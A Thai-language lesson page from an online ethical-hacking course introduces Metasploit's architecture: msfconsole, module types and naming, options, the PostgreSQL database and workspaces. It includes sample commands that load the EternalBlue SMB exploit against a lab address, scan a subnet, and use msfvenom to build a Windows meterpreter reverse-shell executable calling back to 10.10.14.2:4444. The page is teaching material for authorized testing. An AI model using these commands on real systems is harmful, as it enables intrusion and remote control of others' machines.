0Pricing
Ethical Hacking Academy · บทเรียน

สถาปัตยกรรม Metasploit

มอดูลและคอนโซล

สถาปัตยกรรม Metasploit เป็นบทเรียน Ethical Hacking Academy ฟรีบน CoddyKit นี่คือบทเรียนที่ 1 จากทั้งหมด 4 บทเรียน คุณสามารถอ่านบทเรียนทั้งหมดด้านล่างฟรี — จากนั้นลองปฏิบัติด้วยตัวคุณเองในเบราว์เซอร์พร้อมตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7 บทเรียนนี้เป็นส่วนหนึ่งของเส้นทางการเรียน Ethical Hacking Academy และความก้าวหน้าของคุณจะซิงค์ข้ามเว็บและแอป CoddyKit คอร์ส Ethical Hacking Academy มีบทเรียนทั้งหมด 4 บทเรียน

Metasploit คืออะไร

Metasploit เป็นเฟรมเวิร์กสำหรับใช้ประโยชน์จากช่องโหว่ที่ได้รับความนิยมมากที่สุด โดยมีคลัง exploit, payload และเครื่องมือที่จัดเป็นระบบ สำหรับทดสอบและสาธิตช่องโหว่ระหว่างการปฏิบัติงานที่ได้รับอนุญาต

แทนที่จะเขียนการโจมตีทุกครั้งตั้งแต่ต้น คุณสามารถโหลดโมดูลที่ผ่านการพิสูจน์แล้ว กำหนดค่า และเรียกใช้ผ่านอินเทอร์เฟซที่สม่ำเสมอ

msfconsole

อินเทอร์เฟซหลักคือ msfconsole ซึ่งเป็นเชลล์บรรทัดคำสั่งแบบโต้ตอบ โดยมีการเติมคำสั่งอัตโนมัติด้วยปุ่มแท็บ ประวัติคำสั่ง และการเข้าถึงทุกโมดูล

คุณเปิดใช้งานจากเทอร์มินัล แล้วทำงานทั้งหมดภายในพรอมต์ของโปรแกรม

msfconsole
# msf6 > help

ประเภทของโมดูล

Metasploit จัดความสามารถต่าง ๆ เป็นประเภทของโมดูล:

  • exploit: โค้ดที่ใช้ประโยชน์จากช่องโหว่
  • payload: โค้ดที่ทำงานบนเป้าหมายหลังใช้ประโยชน์จากช่องโหว่
  • auxiliary: เครื่องมือสแกน เครื่องมือทดสอบอินพุตผิดรูปแบบ และเครื่องมือที่ไม่ส่ง payload
  • post: การดำเนินการหลังการเจาะระบบบนโฮสต์ที่ถูกบุกรุก
  • encoder และ nop: ช่วยให้ payload หลีกเลี่ยงการตรวจจับ

การตั้งชื่อโมดูล

โมดูลใช้เส้นทางแบบลำดับชั้นที่บอกอย่างชัดเจนว่าโมดูลทำอะไร การอ่านเส้นทางจะเผยให้เห็นประเภท แพลตฟอร์ม และบริการเป้าหมาย

exploit/windows/smb/ms17_010_eternalblue
# type / platform / service / specific exploit

Exploit กับ Payload

ข้อแตกต่างสำคัญมีดังนี้:

  • exploit คือช่องทางเข้าสู่ระบบ โดยใช้ทำลายซอฟต์แวร์ที่มีช่องโหว่
  • payload คือสิ่งที่คุณต้องการให้เกิดขึ้นเมื่อเข้าระบบได้แล้ว เช่น การเปิดเชลล์

คุณต้องจับคู่ทั้งสองอย่างเข้าด้วยกัน: exploit หนึ่งรายการสามารถส่ง payload ได้หลายแบบ ขึ้นอยู่กับเป้าหมายและระบบเป้าหมาย

ลำดับการทำงานกับโมดูล

การทำงานกับโมดูลใด ๆ จะเป็นไปตามวงจรที่ทำซ้ำได้:

  • search เพื่อค้นหาโมดูล
  • use เพื่อโหลดโมดูล
  • กำหนดตัวเลือก เช่น RHOSTS และ LHOST
  • run หรือ exploit โมดูล

ความสม่ำเสมอนี้คือเหตุผลที่เฟรมเวิร์กสามารถขยายการทำงานครอบคลุมโมดูลนับพันรายการได้

use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.10.5
exploit

คลังข้อมูลและตัวเลือก

การตั้งค่าโมดูลจะอยู่ในคลังข้อมูล ตัวเลือกแต่ละรายการอาจเป็นสิ่งจำเป็นหรือไม่จำเป็นก็ได้

  • RHOSTS: ที่อยู่ของเป้าหมายระยะไกล
  • RPORT: พอร์ตระยะไกล
  • LHOST: ที่อยู่สำหรับรับการเชื่อมต่อย้อนกลับ
  • LPORT: พอร์ตสำหรับรับการเชื่อมต่อ

ใช้ show options เพื่อดูว่าโมดูลต้องการสิ่งใดก่อนเรียกใช้

ฐานข้อมูล

Metasploit ทำงานร่วมกับฐานข้อมูล PostgreSQL เพื่อจัดเก็บโฮสต์ บริการ ข้อมูลที่ยึดมาได้ และข้อมูลรับรองที่ค้นพบระหว่างการปฏิบัติงาน ซึ่งช่วยให้คุณติดตามขอบเขตงานขนาดใหญ่ได้อย่างมีประสิทธิภาพ

เริ่มการทำงานของฐานข้อมูลก่อนเปิดคอนโซล เพื่อให้ระบบบันทึกผลลัพธ์โดยอัตโนมัติ

msfdb init
# Inside msfconsole:
# db_status   hosts   services   creds

โมดูลเสริม

โมดูล Auxiliary ทำงานที่เป็นประโยชน์โดยไม่ต้องใช้ประโยชน์จากช่องโหว่ เช่น การสแกนพอร์ต การแจกแจงบริการ การเดารหัสผ่านเพื่อเข้าสู่ระบบแบบลองทุกความเป็นไปได้ และการทดสอบอินพุตผิดรูปแบบ

โมดูลเหล่านี้มักเป็นขั้นตอนแรกของคุณ ใช้รวบรวมข้อมูลที่จำเป็นก่อนเลือก exploit

use auxiliary/scanner/smb/smb_version
set RHOSTS 10.10.10.0/24
run

msfvenom

msfvenom เป็นเครื่องมือคู่หูสำหรับสร้าง payload แบบอิสระเป็นไฟล์ ได้แก่ ไฟล์ปฏิบัติการ สคริปต์ หรือ shellcode ที่คุณส่งไปทำงานนอกคอนโซล

เครื่องมือนี้รวมการสร้าง payload และการเข้ารหัสไว้ในคำสั่งเดียว เหมาะสำหรับการจำลองฟิชชิงหรือการส่งมอบแบบกำหนดเองในการทดสอบที่ได้รับอนุญาต

msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 -f exe -o shell.exe

พื้นที่ทำงาน

สำหรับการปฏิบัติงานหลายรายการ พื้นที่ทำงานของ Metasploit จะแยกโฮสต์ บริการ และข้อมูลที่ยึดมาได้ของลูกค้าแต่ละรายไว้ในฐานข้อมูล คุณสามารถสลับไปมาระหว่างพื้นที่เหล่านี้ เพื่อไม่ให้ข้อมูลปะปนกันระหว่างการประเมิน

workspace -a clientA      # add a workspace
workspace clientA         # switch to it
workspace                 # list all

ตรวจสอบอย่างรวดเร็ว

ทดสอบความเข้าใจเกี่ยวกับประเภทของโมดูล

สรุปทบทวน

คุณได้เรียนรู้สถาปัตยกรรมของ Metasploit:

  • msfconsole คืออินเทอร์เฟซหลัก ส่วน msfvenom ใช้สร้าง payload แบบอิสระ
  • ประเภทของโมดูล: exploit, payload, auxiliary, post, encoder/nop
  • เส้นทางของโมดูลระบุประเภท/แพลตฟอร์ม/บริการ
  • ลำดับการทำงาน: search, use, set options, run โดยการตั้งค่าจะอยู่ในคลังข้อมูล
  • ฐานข้อมูล PostgreSQL ติดตามโฮสต์ บริการ และข้อมูลที่ยึดมาได้

ถัดไป: การค้นหาและใช้ exploit อย่างมีประสิทธิภาพ

คำถามที่พบบ่อย

บทเรียน “สถาปัตยกรรม Metasploit” ฟรีหรือไม่

ใช่ — ข้อความเต็มของ “สถาปัตยกรรม Metasploit” ฟรีให้อ่านที่นี่บนเว็บ เพื่อปฏิบัติแบบโต้ตอบ (ตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7) และปลดล็อคส่วนที่เหลือของคอร์ส Ethical Hacking Academy ให้อัปเกรดเป็น CoddyKit PRO คอร์ส Ethical Hacking Academy มีบทเรียนทั้งหมด 4 บทเรียน

คุณจะเรียนรู้อะไรในบทเรียน “สถาปัตยกรรม Metasploit”

มอดูลและคอนโซล คุณปฏิบัติ Ethical Hacking Academy ด้วยโค้ดที่ใช้งานได้จริงที่คุณเรียกใช้โดยตรงในเบราว์เซอร์ และติวเตอร์ AI ตลอด 24/7 ตอบคำถามของคุณขณะที่คุณไปผ่านบทเรียน

คุณต้องมีประสบการณ์ก่อนที่จะเริ่มเรียน Ethical Hacking Academy หรือไม่

ไม่จำเป็นต้องมีประสบการณ์มาก่อน Ethical Hacking Academy บน CoddyKit ออกแบบมาสำหรับผู้เริ่มต้นไปจนถึงผู้เรียนขั้นสูง คุณสามารถเริ่มต้นที่นี่หรือเริ่มจากตัวแรกและเรียนด้วยความเร็วของคุณเอง นี่คือบทเรียนที่ 1 จากทั้งหมด 4 บทเรียน

บทเรียน “สถาปัตยกรรม Metasploit” ใช้เวลานานแค่ไหน

บทเรียน CoddyKit ส่วนใหญ่ใช้เวลาประมาณ 5–10 นาที แต่ละบทเรียนจึงสั้นและเป็นแบบโต้ตอบ คุณสามารถก้าวหน้าอย่างต่อเนื่องและกลับมาเรียนต่อจากตรงที่เพิ่งหยุดบนเว็บและแอปได้เลย

ฉันเขียนและรันโค้ดในบทเรียน Ethical Hacking Academy นี้ได้ไหม

ได้ บทเรียน Ethical Hacking Academy ทุกบทมีตัวแก้ไขโค้ดในตัว คุณจึงเขียนและรันโค้ดจริงได้เลยในเบราว์เซอร์ และได้รับข้อเสนอแนะจาก AI ในทันที — ไม่ต้องติดตั้งในเครื่องของคุณ

บทเรียนทั้งหมดในหลักสูตรนี้

  1. สถาปัตยกรรม Metasploit
  2. การค้นหาและใช้ช่องโหว่
  3. เพย์โหลดและ Meterpreter
  4. มอดูลหลังการโจมตี
← กลับไปที่ Ethical Hacking Academy